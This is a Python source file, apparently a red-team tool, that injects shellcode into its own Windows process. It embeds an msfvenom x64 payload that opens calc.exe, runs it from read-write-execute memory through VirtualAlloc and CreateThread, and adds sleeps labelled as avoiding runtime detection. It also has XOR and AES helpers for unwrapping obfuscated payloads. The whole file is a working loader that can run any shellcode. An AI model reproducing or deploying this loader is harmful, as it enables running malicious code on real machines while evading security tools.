# Author: @m8sec | |
# Description: Injects shellcode into the current process. | |
import ctypes
import ctypes.wintypes as wt
import hashlib
import sys
from base64 import b64decode
from time import sleep

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
######################################## | |
# Optional shellcode decryption helpers, written for payloads produced by
# shellcrypt.py. (Currently not in use: `buf` below is stored in the clear.)
######################################## | |
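def DecryptXOR(data, key):
    """Base64-decode *data* and XOR it against a repeating *key*.

    Intended counterpart of ``python3 shellcrypt.py -e xor -f base64 calc.bin``.

    Args:
        data: base64 text (``str`` or ``bytes``) of the XOR-ed payload.
        key: the repeating key, either a ``str`` (one byte per ``ord()`` of
            each character, as the original accepted) or raw ``bytes``.

    Returns:
        The de-obfuscated payload as ``bytes`` (empty input gives ``b""``).

    Raises:
        ValueError: if *key* is empty, since a zero-length key cannot be
            cycled (the original failed here with ZeroDivisionError).
        binascii.Error: if *data* is not valid base64.

    Note:
        Repeating-key XOR is obfuscation, not encryption: it hides the
        payload from trivial byte matching only, and the key travels with
        the loader.
    """
    if not key:
        raise ValueError("XOR key must not be empty")
    # Normalise the key to bytes; str keys map each character via ord(),
    # which raises for code points above 0xFF exactly as the original did.
    if isinstance(key, (bytes, bytearray)):
        key_bytes = bytes(key)
    else:
        key_bytes = bytes(ord(ch) for ch in key)
    raw = b64decode(data)
    klen = len(key_bytes)
    # XOR each payload byte with the key byte at the same position mod key length.
    return bytes(b ^ key_bytes[i % klen] for i, b in enumerate(raw))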
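def DecryptAES(data, key):
    """Base64-decode *data* and decrypt it with AES-CBC, stripping PKCS#7 padding.

    Intended counterpart of ``python3 shellcrypt.py -e aes -f base64 calc.bin``:
    the AES key is SHA-256 of the base64-decoded *key* and the IV is sixteen
    zero bytes, so this only unwraps output produced with that same scheme.

    Args:
        data: base64 text of the ciphertext; its decoded length must be a
            multiple of the 16-byte AES block.
        key: base64 text of the key material that the encryptor hashed.

    Returns:
        The plaintext as ``bytes`` with its PKCS#7 padding removed.

    Raises:
        ValueError: if the ciphertext is not a whole number of blocks, or the
            padding is invalid after decryption (wrong key or corrupted data).
        binascii.Error: if either base64 input is malformed.

    Note:
        A fixed all-zero IV and unsalted SHA-256 key derivation are dictated
        by the format being consumed; they are fine for unwrapping a payload
        at run time but are not a design to copy where confidentiality matters.
    """
    ciphertext = b64decode(data)
    raw_key = b64decode(key)
    iv = b"\x00" * AES.block_size
    cipher = AES.new(hashlib.sha256(raw_key).digest(), AES.MODE_CBC, iv)
    # Padding belongs to the plaintext, so it is removed *after* decryption.
    # Padding the ciphertext instead (as this function previously did) left
    # the PKCS#7 bytes in the output and appended a block of garbage.
    return unpad(cipher.decrypt(ciphertext), AES.block_size)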
# msfvenom -p windows/x64/exec cmd=calc.exe -f py -o calc.bin
# x64 "exec" payload from msfvenom that launches calc.exe; the command string
# is the NUL-terminated tail of the buffer. 276 bytes, stored in the clear
# (the decrypt helpers above are not applied to it). Being an x64 payload it
# can only be run from a 64-bit process. The literal is assembled with
# adjacent-string concatenation so the bytes stay identical to the generator's.
buf = (
    b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
    b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
    b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
    b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
    b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
    b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
    b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
    b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
    b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
    b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
    b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
    b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
    b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
    b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
    b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
    b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
    b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
    b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
    b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
    b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
    b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65"
    b"\x78\x65\x00"
)
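# Win32 constants used below (values from the VirtualAlloc / WaitForSingleObject docs).
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
INFINITE = 0xFFFFFFFF


def _bind_kernel32():
    """Load kernel32 and declare a prototype for every function the loader calls.

    Explicit ``argtypes``/``restype`` keep ctypes from applying its default
    32-bit ``int`` conversions, which would truncate 64-bit pointers and
    handles. The original set ``argtypes`` on CreateRemoteThread but then
    called CreateThread, so CreateThread ran with no prototype at all.
    ``use_last_error=True`` makes ``ctypes.get_last_error()`` reliable for
    error reporting.
    """
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)

    # LPVOID VirtualAlloc(LPVOID, SIZE_T, DWORD allocType, DWORD protect)
    k32.VirtualAlloc.argtypes = (wt.LPVOID, ctypes.c_size_t, wt.DWORD, wt.DWORD)
    k32.VirtualAlloc.restype = wt.LPVOID

    # VOID RtlMoveMemory(PVOID dst, const VOID *src, SIZE_T len)
    k32.RtlMoveMemory.argtypes = (wt.LPVOID, wt.LPVOID, ctypes.c_size_t)
    k32.RtlMoveMemory.restype = None

    # HANDLE CreateThread(LPSECURITY_ATTRIBUTES, SIZE_T stack, LPTHREAD_START_ROUTINE,
    #                     LPVOID param, DWORD flags, LPDWORD threadId)
    k32.CreateThread.argtypes = (wt.LPVOID, ctypes.c_size_t, wt.LPVOID,
                                 wt.LPVOID, wt.DWORD, wt.LPDWORD)
    k32.CreateThread.restype = wt.HANDLE

    # DWORD WaitForSingleObject(HANDLE, DWORD millis)
    k32.WaitForSingleObject.argtypes = (wt.HANDLE, wt.DWORD)
    k32.WaitForSingleObject.restype = wt.DWORD

    # BOOL CloseHandle(HANDLE)
    k32.CloseHandle.argtypes = (wt.HANDLE,)
    k32.CloseHandle.restype = wt.BOOL
    return k32


def _run_loader(payload):
    """Copy *payload* into a fresh RWX region in this process and run it on a new thread.

    Args:
        payload: the raw shellcode bytes to execute.

    Returns:
        The process exit status: 0 once the payload thread has finished, 1 if
        the preconditions are not met.

    Raises:
        OSError: (via ``ctypes.WinError``) if VirtualAlloc or CreateThread
            fails; the Win32 error text is included.
    """
    # The embedded payload is windows/x64, so a 32-bit interpreter would crash
    # on the first instruction; fail early with a clear message instead.
    if ctypes.sizeof(ctypes.c_void_p) != 8:
        print("[-] Error: payload is windows/x64; run this with a 64-bit Python.")
        return 1
    if not payload:
        print("[-] Error: empty payload, nothing to run.")
        return 1

    k32 = _bind_kernel32()
    print("[+] Starting shellcode loader:")

    # One region, exactly the payload size, writable and executable at once
    # (PAGE_EXECUTE_READWRITE). It is never freed or re-protected afterwards.
    mem = k32.VirtualAlloc(None, len(payload), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    if not mem:
        # The original formatted a NULL here and died inside str.format instead.
        raise ctypes.WinError(ctypes.get_last_error())
    print('[*] Allocated memory space at: {:08X}'.format(mem))
    print('[*] Interval sleep to avoid runtime detection (1/2).')
    sleep(5)

    # bytes objects are accepted for an LPVOID parameter and passed as a pointer
    # to their contents.
    k32.RtlMoveMemory(mem, payload, len(payload))
    print('[*] Copied payload into memory.')
    print('[*] Interval sleep to avoid runtime detection (2/2).')
    sleep(5)

    thread_id = wt.DWORD(0)
    th = k32.CreateThread(None, 0, mem, None, 0, ctypes.byref(thread_id))
    if not th:
        raise ctypes.WinError(ctypes.get_last_error())
    print('[*] Created thread in current process.')
    try:
        # Block until the payload thread exits; the original passed -1, which
        # ctypes wrapped to the same INFINITE value.
        k32.WaitForSingleObject(th, INFINITE)
    finally:
        # The original never closed the thread handle.
        k32.CloseHandle(th)
    return 0


def main():
    """Script entry point: run the embedded payload and exit with a status code."""
    try:
        status = _run_loader(buf)
    except KeyboardInterrupt:
        print("[!] Key detected, closing")
        status = 1
    except Exception as e:
        # Top-level boundary: report the error text rather than a traceback.
        print("[-] Error: {}".format(str(e)))
        # The original exited 0 on failure, which hid errors from any caller
        # checking the exit status.
        status = 1
    sys.exit(status)


if __name__ == "__main__":
    main()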